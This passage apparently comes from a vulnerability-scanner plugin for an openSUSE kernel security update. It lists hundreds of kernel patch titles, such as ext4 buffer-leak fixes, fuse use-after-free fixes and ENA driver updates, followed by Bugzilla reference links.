devices during trim, instead of\n fs_devices::alloc_list (bnc#1012382).\n\n - btrfs: locking: Add extra check in\n btrfs_init_new_buffer() to avoid deadlock (bnc#1012382).\n\n - btrfs: make sure we create all new block groups\n (bnc#1012382).\n\n - btrfs: qgroup: Dirty all qgroups before rescan\n (bnc#1012382).\n\n - btrfs: reset max_extent_size on clear in a bitmap\n (bnc#1012382).\n\n - btrfs: set max_extent_size properly (bnc#1012382).\n\n - btrfs: wait on caching when putting the bg cache\n (bnc#1012382).\n\n - cachefiles: fix the race between\n cachefiles_bury_object() and rmdir(2) (bnc#1012382).\n\n - cdc-acm: correct counting of UART states in serial state\n notification (bnc#1012382).\n\n - ceph: call setattr_prepare from ceph_setattr instead of\n inode_change_ok (bsc#1114763).\n\n - ceph: fix dentry leak in ceph_readdir_prepopulate\n (bsc#1114839).\n\n - ceph: quota: fix NULL pointer dereference in quota check\n (bsc#1114839).\n\n - cfg80211: reg: Init wiphy_idx in regulatory_hint_core()\n (bnc#1012382).\n\n - clk: s2mps11: Add used attribute to s2mps11_dt_match\n (git-fixes).\n\n - clk: s2mps11: Fix matching when built as module and DT\n node contains compatible (bnc#1012382).\n\n - clk: samsung: exynos5420: Enable PERIS clocks for\n suspend (bnc#1012382).\n\n - clockevents/drivers/i8253: Add support for PIT shutdown\n quirk (bnc#1012382).\n\n - configfs: replace strncpy with memcpy (bnc#1012382).\n\n - cpuidle: Do not access cpuidle_devices when\n !CONFIG_CPU_IDLE (bnc#1012382).\n\n - crypto, x86: aesni - fix token pasting for clang\n (bnc#1012382).\n\n - crypto: arm64/sha - avoid non-standard inline asm tricks\n (bnc#1012382).\n\n - crypto: lrw - Fix out-of bounds access on counter\n overflow (bnc#1012382).\n\n - crypto: shash - Fix a sleep-in-atomic bug in\n shash_setkey_unaligned (bnc#1012382).\n\n - cxgb4: Add support for new flash parts (bsc#1102439).\n\n - cxgb4: Fix FW flash errors (bsc#1102439).\n\n - cxgb4: assume flash part size to be 4MB, if it can't be\n determined (bsc#1102439).\n\n - cxgb4: fix missing break in switch and indent return\n statements (bsc#1102439).\n\n - cxgb4: support new ISSI flash parts (bsc#1102439).\n\n - dm ioctl: harden copy_params()'s copy_from_user() from\n malicious users (bnc#1012382).\n\n - dm raid: stop using BUG() in __rdev_sectors()\n (bsc#1046264).\n\n - dmaengine: dma-jz4780: Return error if not probed from\n DT (bnc#1012382).\n\n - dpaa_eth: fix dpaa_get_stats64 to match prototype\n (bsc#1114763).\n\n - driver/dma/ioat: Call del_timer_sync() without holding\n prep_lock (bnc#1012382).\n\n - drivers/misc/sgi-gru: fix Spectre v1 vulnerability\n (bnc#1012382).\n\n - drm/ast: Remove existing framebuffers before loading\n driver (boo#1112963)\n\n - drm/dp_mst: Check if primary mstb is null (bnc#1012382).\n\n - drm/hisilicon: hibmc: Do not carry error code in HiBMC\n framebuffer (bsc#1113766)\n\n - drm/hisilicon: hibmc: Do not overwrite fb helper surface\n depth (bsc#1113766)\n\n - drm/i915/hdmi: Add HDMI 2.0 audio clock recovery N\n values (bnc#1012382).\n\n - drm/nouveau/fbcon: fix oops without fbdev emulation\n (bnc#1012382).\n\n - drm/omap: fix memory barrier bug in DMM driver\n (bnc#1012382).\n\n - drm/rockchip: Allow driver to be shutdown on\n reboot/kexec (bnc#1012382).\n\n - e1000: avoid NULL pointer dereference on invalid stat\n type (bnc#1012382).\n\n - e1000: fix race condition between e1000_down() and\n e1000_watchdog (bnc#1012382).\n\n - efi/libstub/arm64: Force 'hidden' visibility for section\n markers (bnc#1012382).\n\n - efi/libstub/arm64: Set -fpie when building the EFI stub\n (bnc#1012382).\n\n - ext4: add missing brelse() add_new_gdb_meta_bg()'s error\n path (bnc#1012382).\n\n - ext4: add missing brelse() in\n set_flexbg_block_bitmap()'s error path (bnc#1012382).\n\n - ext4: add missing brelse() update_backups()'s error path\n (bnc#1012382).\n\n - ext4: avoid buffer leak in ext4_orphan_add() after prior\n errors (bnc#1012382).\n\n - ext4: avoid possible double brelse() in add_new_gdb() on\n error path (bnc#1012382).\n\n - ext4: avoid potential extra brelse in\n setup_new_flex_group_blocks() (bnc#1012382).\n\n - ext4: fix argument checking in EXT4_IOC_MOVE_EXT\n (bnc#1012382).\n\n - ext4: fix buffer leak in __ext4_read_dirblock() on error\n path (bnc#1012382).\n\n - ext4: fix buffer leak in ext4_xattr_move_to_block() on\n error path (bnc#1012382).\n\n - ext4: fix missing cleanup if ext4_alloc_flex_bg_array()\n fails while resizing (bnc#1012382).\n\n - ext4: fix possible inode leak in the retry loop of\n ext4_resize_fs() (bnc#1012382).\n\n - ext4: fix possible leak of sbi->s_group_desc_leak in\n error path (bnc#1012382).\n\n - ext4: initialize retries variable in\n ext4_da_write_inline_data_begin() (bnc#1012382).\n\n - ext4: release bs.bh before re-using in\n ext4_xattr_block_find() (bnc#1012382).\n\n - fcoe: remove duplicate debugging message in\n fcoe_ctlr_vn_add (bsc#1114763).\n\n - flow_dissector: do not dissect l4 ports for fragments\n (bnc#1012382).\n\n - fs, elf: make sure to page align bss in load_elf_library\n (bnc#1012382).\n\n - fs/exofs: fix potential memory leak in mount option\n parsing (bnc#1012382).\n\n - fs/fat/fatent.c: add cond_resched() to\n fat_count_free_clusters() (bnc#1012382).\n\n - fscache: fix race between enablement and dropping of\n object (bsc#1107385).\n\n - fuse: Dont call set_page_dirty_lock() for ITER_BVEC\n pages for async_dio (bnc#1012382).\n\n - fuse: Fix use-after-free in fuse_dev_do_read()\n (bnc#1012382).\n\n - fuse: Fix use-after-free in fuse_dev_do_write()\n (bnc#1012382).\n\n - fuse: fix blocked_waitq wakeup (bnc#1012382).\n\n - fuse: fix leaked notify reply (bnc#1012382).\n\n - fuse: set FR_SENT while locked (bnc#1012382).\n\n - genirq: Fix race on spurious interrupt detection\n (bnc#1012382).\n\n - gfs2: Put bitmap buffers in put_super (bnc#1012382).\n\n - gfs2_meta: ->mount() can get NULL dev_name\n (bnc#1012382).\n\n - gpio: msic: fix error return code in\n platform_msic_gpio_probe() (bnc#1012382).\n\n - gpu: host1x: fix error return code in host1x_probe()\n (bnc#1012382).\n\n - hfs: prevent btree data loss on root split\n (bnc#1012382).\n\n - hfsplus: prevent btree data loss on root split\n (bnc#1012382).\n\n - hugetlbfs: dirty pages as they are added to pagecache\n (bnc#1012382).\n\n - hugetlbfs: fix kernel BUG at fs/hugetlbfs/inode.c:444!\n (bnc#1012382).\n\n - hwmon: (ibmpowernv) Remove bogus __init annotations\n (bnc#1012382).\n\n - hwmon: (pmbus) Fix page count auto-detection\n (bnc#1012382).\n\n - ibmvnic: Fix RX queue buffer cleanup (bsc#1115440,\n bsc#1115433).\n\n - ibmvnic: fix accelerated VLAN handling ().\n\n - ibmvnic: fix index in release_rx_pools (bsc#1115440).\n\n - ibmvnic: remove ndo_poll_controller ().\n\n - igb: Remove superfluous reset to PHY and page 0\n selection (bnc#1012382).\n\n - iio: adc: at91: fix acking DRDY irq on simple\n conversions (bnc#1012382).\n\n - iio: adc: at91: fix wrong channel number in triggered\n buffer mode (bnc#1012382).\n\n - ima: fix showing large 'violations' or\n 'runtime_measurements_count' (bnc#1012382).\n\n - iommu/arm-smmu: Ensure that page-table updates are\n visible before TLBI (bsc#1106237).\n\n - iommu/ipmmu-vmsa: Fix crash on early domain free\n (bsc#1106105).\n\n - iommu/vt-d: Fix NULL pointer dereference in\n prq_event_thread() (bsc#1106105).\n\n - iommu/vt-d: Use memunmap to free memremap (bsc#1106105).\n\n - ip_tunnel: do not force DF when MTU is locked\n (bnc#1012382).\n\n - ipmi: Fix timer race with module unload (bnc#1012382).\n\n - ipv6/ndisc: Preserve IPv6 control buffer if protocol\n error handlers are called (bnc#1012382).\n\n - ipv6: Fix PMTU updates for UDP/raw sockets in presence\n of VRF (bnc#1012382).\n\n - ipv6: mcast: fix a use-after-free in inet6_mc_check\n (bnc#1012382).\n\n - ipv6: orphan skbs in reassembly unit (bnc#1012382).\n\n - ipv6: set rt6i_protocol properly in the route when it is\n installed (bsc#1114190).\n\n - ipv6: suppress sparse warnings in IP6_ECN_set_ce()\n (bnc#1012382).\n\n - jbd2: fix use after free in jbd2_log_do_checkpoint()\n (bnc#1012382).\n\n - jffs2: free jffs2_sb_info through jffs2_kill_sb()\n (bnc#1012382).\n\n - kABI: protect struct azx (kabi).\n\n - kABI: protect struct cfs_bandwidth (kabi).\n\n - kABI: protect struct esp (kabi).\n\n - kABI: protect struct fuse_io_priv (kabi).\n\n - kabi: revert sig change on pnfs_read_resend_pnfs\n (git-fixes).\n\n - kbuild, LLVMLinux: Add -Werror to cc-option to support\n clang (bnc#1012382).\n\n - kbuild: Add __cc-option macro (bnc#1012382).\n\n - kbuild: Add better clang cross build support\n (bnc#1012382).\n\n - kbuild: Add support to generate LLVM assembly files\n (bnc#1012382).\n\n - kbuild: Consolidate header generation from ASM offset\n information (bnc#1012382).\n\n - kbuild: Set KBUILD_CFLAGS before incl. arch Makefile\n (bnc#1012382).\n\n - kbuild: allow to use GCC toolchain not in Clang search\n path (bnc#1012382).\n\n - kbuild: clang: Disable 'address-of-packed-member'\n warning (bnc#1012382).\n\n - kbuild: clang: add -no-integrated-as to KBUILD_[AC]FLAGS\n (bnc#1012382).\n\n - kbuild: clang: disable unused variable warnings only\n when constant (bnc#1012382).\n\n - kbuild: clang: fix build failures with sparse check\n (bnc#1012382).\n\n - kbuild: clang: remove crufty HOSTCFLAGS (bnc#1012382).\n\n - kbuild: consolidate redundant sed script ASM offset\n generation (bnc#1012382).\n\n - kbuild: drop -Wno-unknown-warning-option from clang\n options (bnc#1012382).\n\n - kbuild: fix asm-offset generation to work with clang\n (bnc#1012382).\n\n - kbuild: fix kernel/bounds.c 'W=1' warning (bnc#1012382).\n\n - kbuild: fix linker feature test macros when cross\n compiling with Clang (bnc#1012382).\n\n - kbuild: move cc-option and cc-disable-warning after\n incl. arch Makefile (bnc#1012382).\n\n - kbuild: set no-integrated-as before incl. arch Makefile\n (bnc#1012382).\n\n - kbuild: use -Oz instead of -Os when using clang\n (bnc#1012382).\n\n - kernel-source.spec: Align source numbering.\n\n - kgdboc: Passing ekgdboc to command line causes panic\n (bnc#1012382).\n\n - kprobes: Return error if we fail to reuse kprobe instead\n of BUG_ON() (bnc#1012382).\n\n - lan78xx: Check for supported Wake-on-LAN modes\n (bnc#1012382).\n\n - lib/raid6: Fix arm64 test build (bnc#1012382).\n\n - libceph: bump CEPH_MSG_MAX_DATA_LEN (bsc#1114839).\n\n - libfc: sync strings with upstream versions\n (bsc#1114763).\n\n - libnvdimm: Hold reference on parent while scheduling\n async init (bnc#1012382).\n\n - lockd: fix access beyond unterminated strings in prints\n (bnc#1012382).\n\n - locking/lockdep: Fix debug_locks off performance problem\n (bnc#1012382).\n\n - mac80211: Always report TX status (bnc#1012382).\n\n - mac80211_hwsim: do not omit multicast announce of first\n added radio (bnc#1012382).\n\n - mach64: fix display corruption on big endian machines\n (bnc#1012382).\n\n - mach64: fix image corruption due to reading accelerator\n registers (bnc#1012382).\n\n - media: em28xx: fix input name for Terratec AV 350\n (bnc#1012382).\n\n - media: em28xx: make v4l2-compliance happier by starting\n sequence on zero (bnc#1012382).\n\n - media: em28xx: use a default format if TRY_FMT fails\n (bnc#1012382).\n\n - media: pci: cx23885: handle adding to list failure\n (bnc#1012382).\n\n - media: tvp5150: fix width alignment during\n set_selection() (bnc#1012382).\n\n - media: v4l: event: Add subscription to list before\n calling 'add' operation (bnc#1012382).\n\n - misc: atmel-ssc: Fix section annotation on\n atmel_ssc_get_driver_data (bnc#1012382).\n\n - mm, elf: handle vm_brk error (bnc#1012382).\n\n - mm: do not bug_on on incorrect length in __mm_populate()\n (bnc#1012382).\n\n - mm: migration: fix migration of huge PMD shared pages\n (bnc#1012382).\n\n - mm: refuse wrapped vm_brk requests (bnc#1012382).\n\n - mm: thp: relax __GFP_THISNODE for MADV_HUGEPAGE mappings\n (bnc#1012382).\n\n - mmc: sdhci-pci-o2micro: Add quirk for O2 Micro dev\n 0x8620 rev 0x01 (bnc#1012382).\n\n - modules: mark __inittest/__exittest as __maybe_unused\n (bnc#1012382).\n\n - mount: Do not allow copying MNT_UNBINDABLE|MNT_LOCKED\n mounts (bnc#1012382).\n\n - mount: Prevent MNT_DETACH from disconnecting locked\n mounts (bnc#1012382).\n\n - mount: Retest MNT_LOCKED in do_umount (bnc#1012382).\n\n - mtd: docg3: do not set conflicting BCH_CONST_PARAMS\n option (bnc#1012382).\n\n - mtd: spi-nor: Add support for is25wp series chips\n (bnc#1012382).\n\n - net-gro: reset skb->pkt_type in napi_reuse_skb()\n (bnc#1012382).\n\n - net/af_iucv: drop inbound packets with invalid flags\n (bnc#1114475, LTC#172679).\n\n - net/af_iucv: fix skb handling on HiperTransport xmit\n error (bnc#1114475, LTC#172679).\n\n - net/ibmnvic: Fix deadlock problem in reset ().\n\n - net/ipv4: defensive cipso option parsing (bnc#1012382).\n\n - net/ipv6: Fix index counter for unicast addresses in\n in6_dump_addrs (bnc#1012382).\n\n - net: bridge: remove ipv6 zero address check in mcast\n queries (bnc#1012382).\n\n - net: cxgb3_main: fix a missing-check bug (bnc#1012382).\n\n - net: drop skb on failure in ip_check_defrag()\n (bnc#1012382).\n\n - net: drop write-only stack variable (bnc#1012382).\n\n - net: ena: Fix Kconfig dependency on X86 (bsc#1117562).\n\n - net: ena: add functions for handling Low Latency Queues\n in ena_com (bsc#1117562).\n\n - net: ena: add functions for handling Low Latency Queues\n in ena_netdev (bsc#1117562).\n\n - net: ena: change rx copybreak default to reduce kernel\n memory pressure (bsc#1117562).\n\n - net: ena: complete host info to match latest ENA spec\n (bsc#1117562).\n\n - net: ena: enable Low Latency Queues (bsc#1117562).\n\n - net: ena: explicit casting and initialization, and\n clearer error handling (bsc#1117562).\n\n - net: ena: fix NULL dereference due to untimely napi\n initialization (bsc#1117562).\n\n - net: ena: fix auto casting to boolean (bsc#1117562).\n\n - net: ena: fix compilation error in xtensa architecture\n (bsc#1117562).\n\n - net: ena: fix crash during failed resume from\n hibernation (bsc#1117562).\n\n - net: ena: fix indentations in ena_defs for better\n readability (bsc#1117562).\n\n - net: ena: fix rare bug when failed restart/resume is\n followed by driver removal (bsc#1117562).\n\n - net: ena: fix warning in rmmod caused by double iounmap\n (bsc#1117562).\n\n - net: ena: introduce Low Latency Queues data structures\n according to ENA spec (bsc#1117562).\n\n - net: ena: limit refill Rx threshold to 256 to avoid\n latency issues (bsc#1117562).\n\n - net: ena: minor performance improvement (bsc#1117562).\n\n - net: ena: remove ndo_poll_controller (bsc#1117562).\n\n - net: ena: remove redundant parameter in\n ena_com_admin_init() (bsc#1117562).\n\n - net: ena: update driver version to 2.0.1 (bsc#1117562).\n\n - net: ena: use CSUM_CHECKED device indication to report\n skb's checksum status (bsc#1117562).\n\n - net: ibm: fix return type of ndo_start_xmit function ().\n\n - net: qla3xxx: Remove overflowing shift statement\n (bnc#1012382).\n\n - net: sched: gred: pass the right attribute to\n gred_change_table_def() (bnc#1012382).\n\n - net: socket: fix a missing-check bug (bnc#1012382).\n\n - net: stmmac: Fix stmmac_mdio_reset() when building\n stmmac as modules (bnc#1012382).\n\n - netfilter: ipset: Correct rcu_dereference() call in\n ip_set_put_comment() (bnc#1012382).\n\n - netfilter: ipset: actually allow allowable CIDR 0 in\n hash:net,port,net (bnc#1012382).\n\n - netfilter: xt_IDLETIMER: add sysfs filename checking\n routine (bnc#1012382).\n\n - new helper: uaccess_kernel() (bnc#1012382).\n\n - nfsd: Fix an Oops in free_session() (bnc#1012382).\n\n - ocfs2: fix a misuse a of brelse after failing\n ocfs2_check_dir_entry (bnc#1012382).\n\n - pNFS/flexfiles: Fix up the ff_layout_write_pagelist\n failure path (git-fixes).\n\n - pNFS/flexfiles: When checking for available DSes,\n conditionally check for MDS io (git-fixes).\n\n - pNFS: Fix a deadlock between read resends and\n layoutreturn (git-fixes).\n\n - parisc: Fix address in HPMC IVA (bnc#1012382).\n\n - parisc: Fix map_pages() to not overwrite existing pte\n entries (bnc#1012382).\n\n - pcmcia: Implement CLKRUN protocol disabling for Ricoh\n bridges (bnc#1012382).\n\n - perf tools: Cleanup trace-event-info 'tdata' leak\n (bnc#1012382).\n\n - perf tools: Disable parallelism for 'make clean'\n (bnc#1012382).\n\n - perf tools: Free temporary 'sys' string in\n read_event_files() (bnc#1012382).\n\n - perf/core: Do not leak event in the syscall error path\n (bnc#1012382).\n\n - perf/ring_buffer: Prevent concurent ring buffer access\n (bnc#1012382).\n\n - pinctrl: qcom: spmi-mpp: Fix drive strength setting\n (bnc#1012382).\n\n - pinctrl: qcom: spmi-mpp: Fix err handling of\n pmic_mpp_set_mux (bnc#1012382).\n\n - pinctrl: spmi-mpp: Fix pmic_mpp_config_get() to be\n compliant (bnc#1012382).\n\n - pinctrl: ssbi-gpio: Fix pm8xxx_pin_config_get() to be\n compliant (bnc#1012382).\n\n - platform/x86: acerhdf: Add BIOS entry for Gateway LT31\n v1.3307 (bnc#1012382).\n\n - pnfs: set NFS_IOHDR_REDO in pnfs_read_resend_pnfs\n (git-fixes).\n\n - powerpc/boot: Ensure _zimage_start is a weak symbol\n (bnc#1012382).\n\n - powerpc/msi: Fix compile error on mpc83xx (bnc#1012382).\n\n - powerpc/nohash: fix undefined behaviour when testing\n page size support (bnc#1012382).\n\n - powerpc/powernv/pci: Work around races in PCI bridge\n enabling (bsc#1066223).\n\n - powerpc/powernv: Do not select the cpufreq governors\n (bsc#1066223).\n\n - powerpc/powernv: Fix opal_event_shutdown() called with\n interrupts disabled (bsc#1066223).\n\n - powerpc/pseries/mobility: Extend start/stop topology\n update scope (bsc#1116950, bsc#1115709).\n\n - powerpc/pseries: Fix DTL buffer registration\n (bsc#1066223).\n\n - powerpc/pseries: Fix how we iterate over the DTL entries\n (bsc#1066223).\n\n - printk: Fix panic caused by passing log_buf_len to\n command line (bnc#1012382).\n\n - ptp: fix Spectre v1 vulnerability (bnc#1012382).\n\n - pxa168fb: prepare the clock (bnc#1012382).\n\n - r8152: Check for supported Wake-on-LAN Modes\n (bnc#1012382).\n\n - r8169: fix NAPI handling under high load (bnc#1012382).\n\n - reiserfs: propagate errors from fill_with_dentries()\n properly (bnc#1012382).\n\n - rpcrdma: Add RPCRDMA_HDRLEN_ERR (git-fixes).\n\n - rps: flow_dissector: Fix uninitialized flow_keys used in\n __skb_get_hash possibly (bsc#1042286 bsc#1108145).\n\n - rtc: hctosys: Add missing range error reporting\n (bnc#1012382).\n\n - rtnetlink: Disallow FDB configuration for non-Ethernet\n device (bnc#1012382).\n\n - s390/mm: Fix ERROR: '__node_distance' undefined!\n (bnc#1012382).\n\n - s390/qeth: fix HiperSockets sniffer (bnc#1114475,\n LTC#172953).\n\n - s390/vdso: add missing FORCE to build targets\n (bnc#1012382).\n\n - s390: qeth: Fix potential array overrun in cmd/rc lookup\n (bnc#1114475, LTC#172682).\n\n - s390: qeth_core_mpc: Use ARRAY_SIZE instead of\n reimplementing its function (bnc#1114475, LTC#172682).\n\n - sc16is7xx: Fix for multi-channel stall (bnc#1012382).\n\n - sch_red: update backlog as well (bnc#1012382).\n\n - sched/cgroup: Fix cgroup entity load tracking tear-down\n (bnc#1012382).\n\n - sched/fair: Fix throttle_list starvation with low CFS\n quota (bnc#1012382).\n\n - scsi: aacraid: Fix typo in blink status (bnc#1012382).\n\n - scsi: core: Allow state transitions from OFFLINE to\n BLOCKED (bsc#1112246).\n\n - scsi: esp_scsi: Track residual for PIO transfers\n (bnc#1012382).\n\n - scsi: libfc: check fc_frame_payload_get() return value\n for null (bsc#1103624, bsc#1104731).\n\n - scsi: libfc: retry PRLI if we cannot analyse the payload\n (bsc#1104731).\n\n - scsi: lpfc: Correct soft lockup when running mds\n diagnostics (bnc#1012382).\n\n - scsi: megaraid_sas: fix a missing-check bug\n (bnc#1012382).\n\n - scsi: qla2xxx: Fix crashes in qla2x00_probe_one on probe\n failure (bsc#1094973).\n\n - scsi: qla2xxx: Fix incorrect port speed being set for FC\n adapters (bnc#1012382).\n\n - scsi: qla2xxx: Fix small memory leak in\n qla2x00_probe_one on probe failure (bsc#1094973).\n\n - sctp: fix race on sctp_id2asoc (bnc#1012382).\n\n - selftests: ftrace: Add synthetic event syntax testcase\n (bnc#1012382).\n\n - ser_gigaset: use container_of() instead of detour\n (bnc#1012382).\n\n - signal/GenWQE: Fix sending of SIGKILL (bnc#1012382).\n\n - signal: Always deliver the kernel's SIGKILL and SIGSTOP\n to a pid namespace init (bnc#1012382).\n\n - smb3: allow stats which track session and share\n reconnects to be reset (bnc#1012382).\n\n - smb3: do not attempt cifs operation in smb3 query info\n error path (bnc#1012382).\n\n - smb3: on kerberos mount if server does not specify auth\n type use krb5 (bnc#1012382).\n\n - smsc75xx: Check for Wake-on-LAN modes (bnc#1012382).\n\n - smsc95xx: Check for Wake-on-LAN modes (bnc#1012382).\n\n - soc/tegra: pmc: Fix child-node lookup (bnc#1012382).\n\n - sparc/pci: Refactor dev_archdata initialization into\n pci_init_dev_archdata (bnc#1012382).\n\n - sparc64 mm: Fix more TSB sizing issues (bnc#1012382).\n\n - sparc64: Fix exception handling in UltraSPARC-III memcpy\n (bnc#1012382).\n\n - sparc: Fix single-pcr perf event counter management\n (bnc#1012382).\n\n - spi/bcm63xx-hspi: fix error return code in\n bcm63xx_hsspi_probe() (bnc#1012382).\n\n - spi/bcm63xx: fix error return code in\n bcm63xx_spi_probe() (bnc#1012382).\n\n - spi: xlp: fix error return code in xlp_spi_probe()\n (bnc#1012382).\n\n - sr9800: Check for supported Wake-on-LAN modes\n (bnc#1012382).\n\n - sunrpc: correct the computation for page_ptr when\n truncating (bnc#1012382).\n\n - svcrdma: Remove unused variable in rdma_copy_tail()\n (git-fixes).\n\n - swim: fix cleanup on setup error (bnc#1012382).\n\n - termios, tty/tty_baudrate.c: fix buffer overrun\n (bnc#1012382).\n\n - tg3: Add PHY reset for 5717/5719/5720 in change ring and\n flow control paths (bnc#1012382).\n\n - thermal: allow spear-thermal driver to be a module\n (bnc#1012382).\n\n - thermal: allow u8500-thermal driver to be a module\n (bnc#1012382).\n\n - tpm: suppress transmit cmd error logs when TPM 1.2 is\n disabled/deactivated (bnc#1012382).\n\n - tracing: Skip more functions when doing stack tracing of\n events (bnc#1012382).\n\n - tty: check name length in tty_find_polling_driver()\n (bnc#1012382).\n\n - tty: serial: sprd: fix error return code in sprd_probe()\n (bnc#1012382).\n\n - tun: Consistently configure generic netdev params via\n rtnetlink (bnc#1012382).\n\n - uio: Fix an Oops on load (bnc#1012382).\n\n - uio: ensure class is registered before devices\n (bnc#1012382).\n\n - uio: make symbol 'uio_class_registered' static\n (git-fixes).\n\n - um: Avoid longjmp/setjmp symbol clashes with\n libpthread.a (bnc#1012382).\n\n - um: Give start_idle_thread() a return code\n (bnc#1012382).\n\n - usb-storage: fix bogus hardware error messages for ATA\n pass-thru devices (bnc#1012382).\n\n - usb: cdc-acm: add entry for Hiro (Conexant) modem\n (bnc#1012382).\n\n - usb: chipidea: Prevent unbalanced IRQ disable\n (bnc#1012382).\n\n - usb: dwc3: omap: fix error return code in\n dwc3_omap_probe() (bnc#1012382).\n\n - usb: ehci-omap: fix error return code in\n ehci_hcd_omap_probe() (bnc#1012382).\n\n - usb: gadget: storage: Fix Spectre v1 vulnerability\n (bnc#1012382).\n\n - usb: imx21-hcd: fix error return code in imx21_probe()\n (bnc#1012382).\n\n - usb: quirks: Add delay-init quirk for Corsair K70 LUX\n RGB (bnc#1012382).\n\n - vhost/scsi: truncate T10 PI iov_iter to prot_bytes\n (bnc#1012382).\n\n - vhost: Fix Spectre V1 vulnerability (bnc#1012382).\n\n - video: fbdev: pxa3xx_gcu: fix error return code in\n pxa3xx_gcu_probe() (bnc#1012382).\n\n - vti6: flush x-netns xfrm cache when vti interface is\n removed (bnc#1012382).\n\n - w1: omap-hdq: fix missing bus unregister at removal\n (bnc#1012382).\n\n - x86/boot: #undef memcpy() et al in string.c\n (bnc#1012382).\n\n - x86/build: Fix stack alignment for CLang (bnc#1012382).\n\n - x86/build: Specify stack alignment for clang\n (bnc#1012382).\n\n - x86/build: Use __cc-option for boot code compiler\n options (bnc#1012382).\n\n - x86/build: Use cc-option to validate stack alignment\n parameter (bnc#1012382).\n\n - x86/corruption-check: Fix panic in\n memory_corruption_check() when boot option without value\n is provided (bnc#1012382).\n\n - x86/kbuild: Use cc-option to enable\n -falign-{jumps/loops} (bnc#1012382).\n\n - x86/kconfig: Fall back to ticket spinlocks\n (bnc#1012382).\n\n - x86/mm/kaslr: Use the _ASM_MUL macro for multiplication\n to work around Clang incompatibility (bnc#1012382).\n\n - x86/mm/pat: Prevent hang during boot when mapping pages\n (bnc#1012382).\n\n - x86: boot: Fix EFI stub alignment (bnc#1012382).\n\n - xen-swiotlb: use actually allocated size on check\n physical continuous (bnc#1012382).\n\n - xen/blkfront: avoid NULL blkfront_info dereference on\n device removal (bsc#1111062).\n\n - xen: fix race in xen_qlock_wait() (bnc#1012382).\n\n - xen: fix xen_qlock_wait() (bnc#1012382).\n\n - xen: make xen_qlock_wait() nestable (bnc#1012382).\n\n - xfrm6: call kfree_skb when skb is toobig (bnc#1012382).\n\n - xfrm: Clear sk_dst_cache when applying per-socket policy\n (bnc#1012382).\n\n - xfrm: Validate address prefix lengths in the xfrm\n selector (bnc#1012382).\n\n - xfrm: use complete IPv6 addresses for hash\n (bsc#1109330).\n\n - xfrm: validate template mode (bnc#1012382).\n\n - xfs/dmapi: restore event in xfs_getbmap (bsc#1114763).\n\n - xfs: Fix error code in 'xfs_ioc_getbmap()' (git-fixes).\n\n - xprtrdma: Disable RPC/RDMA backchannel debugging\n messages (git-fixes).\n\n - xprtrdma: Disable pad optimization by default\n (git-fixes).\n\n - xprtrdma: Fix Read chunk padding (git-fixes).\n\n - xprtrdma: Fix additional uses of\n spin_lock_irqsave(rb_lock) (git-fixes).\n\n - xprtrdma: Fix backchannel allocation of extra\n rpcrdma_reps (git-fixes).\n\n - xprtrdma: Fix receive buffer accounting (git-fixes).\n\n - xprtrdma: Serialize credit accounting again (git-fixes).\n\n - xprtrdma: checking for NULL instead of IS_ERR()\n (git-fixes).\n\n - xprtrdma: rpcrdma_bc_receive_call() should init\n rq_private_buf.len (git-fixes).\n\n - xprtrdma: xprt_rdma_free() must not release backchannel\n reqs (git-fixes).\n\n - xtensa: add NOTES section to the linker script\n (bnc#1012382).\n\n - xtensa: fix boot parameters address translation\n (bnc#1012382).\n\n - xtensa: make sure bFLT stack is 16 byte aligned\n (bnc#1012382).\n\n - zram: close udev startup race condition as default\n groups (bnc#1012382).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1027457\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1046264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1066223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102439\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1103624\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104731\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106237\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1107385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111062\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111809\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114763\"\n 